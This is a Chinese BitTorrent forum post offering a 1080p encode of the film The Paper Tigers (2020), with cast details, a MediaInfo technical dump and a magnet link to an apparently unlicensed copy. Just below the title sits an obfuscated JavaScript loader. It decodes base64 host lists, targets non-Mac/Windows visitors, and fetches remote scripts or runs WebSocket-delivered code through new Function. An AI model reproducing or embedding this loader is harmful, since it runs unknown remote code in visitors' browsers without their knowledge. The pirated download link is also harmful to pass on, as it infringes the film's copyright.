三只老虎[中文字幕].The.Paper.Tigers.2020.1080p.BluRay.DTS.x265-10bit-迅雷下载 6.20GB

版主小s 23天前 172

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 三只老虎 / 三纸老虎

◎片 名 The Paper Tigers

◎年 代 2020

◎产 地 美国

◎类 别 喜剧 / 动作

◎语 言 英语

◎上映日期 2020-08-30(Fantasia International Film Festival) / 2021-05-07(美国)

◎IMDb链接 https://www.imdb.com/title/tt6060444/

◎豆瓣评分 6.1/10 (271人评价)

◎豆瓣链接 https://movie.douban.com/subject/34847463/

◎片 长 108分钟

◎导 演 包·特兰 Quoc Bao Tran (id:1239461)

◎编 剧 包·特兰 Quoc Bao Tran (id:1239461)

◎演 员 朴在书 Jae Suh Park (id:1298619)

冈本玉二 Yuji Okumoto (id:1132216)

约书亚·萨达索 Yoshua Sudarso (id:1270574)

袁文忠 Ron Yuan (id:1032226)

袁之正 Roger Yuan (id:1354776)

米凯尔·珊农·詹金斯 Mykel Shannon Jenkins (id:1112395)

Brian Le Brian Le (id:1456759)

Phillip Dang Phillip Dang (id:1456758)

Andy Le Andy Le (id:1456768)

◎标 签 喜剧 / 动作 / 功夫 / 美国 / 2020 / 黑色幽默 / 美国电影 / 美國

◎简 介

Adeadbeatdad,aninsurancescammer,andanMMAcoachmustavengetheirKungFumaster'sdeathbutfirst-theyneedtocallinsickattheir9-to-5's.

  1. General

  2. Unique ID : 88476623631181406987977095920825582049 (0x428FFA56899851E910FF41520596C1E1)

  3. Complete name : The.Paper.Tigers.2020.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 6.19 GiB

  7. Duration : 1 h 50 min

  8. Overall bit rate : 8 004 kb/s

  9. Movie name : The Paper Tigers 2020 1080p BluRay DTS x265-10bit-HDS

  10. Encoded date : UTC 2021-07-01 00:43:44

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 50 min

  20. Bit rate : 6 411 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 036 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.134

  30. Stream size : 4.96 GiB (80%)

  31. Title : [email protected]

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 50 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.17 GiB (19%)

  50. Title : English

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 44 min

  61. Bit rate : 33.2 kb/s

  62. Count of elements : 2840

  63. Stream size : 24.9 MiB (0%)

  64. Title : CHS

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 44 min

  75. Bit rate : 33.9 kb/s

  76. Count of elements : 2840

  77. Stream size : 25.4 MiB (0%)

  78. Title : CHT

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Text #3

  83. ID : 5

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 44 min

  89. Bit rate : 33.4 kb/s

  90. Count of elements : 2808

  91. Stream size : 25.0 MiB (0%)

  92. Title : CHS

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Text #4

  97. ID : 6

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 45 min

  103. Bit rate : 35.8 kb/s

  104. Count of elements : 2813

  105. Stream size : 26.9 MiB (0%)

  106. Title : CHT

  107. Language : Chinese

  108. Default : No

  109. Forced : No


  110. Text #5

  111. ID : 7

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 46 min

  117. Bit rate : 44.9 kb/s

  118. Count of elements : 3394

  119. Stream size : 34.1 MiB (1%)

  120. Title : ENG

  121. Language : English

  122. Default : No

  123. Forced : No


  124. Menu

  125. 00:00:00.000 : en:Chapter 01

  126. 00:09:45.668 : en:Chapter 02

  127. 00:19:30.336 : en:Chapter 03

  128. 00:31:05.906 : en:Chapter 04

  129. 00:44:30.293 : en:Chapter 05

  130. 00:52:50.626 : en:Chapter 06

  131. 01:04:33.953 : en:Chapter 07

  132. 01:15:05.042 : en:Chapter 08

  133. 01:26:18.548 : en:Chapter 09

  134. 01:37:38.936 : en:Chapter 10

  135. 01:47:01.915 : en:Chapter 11


TAGS 动作 喜剧

磁力链:
  • magnet:?xt=urn:btih:51B9A71B3A5A5B45439C4B172A0D97F50C37FEFF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回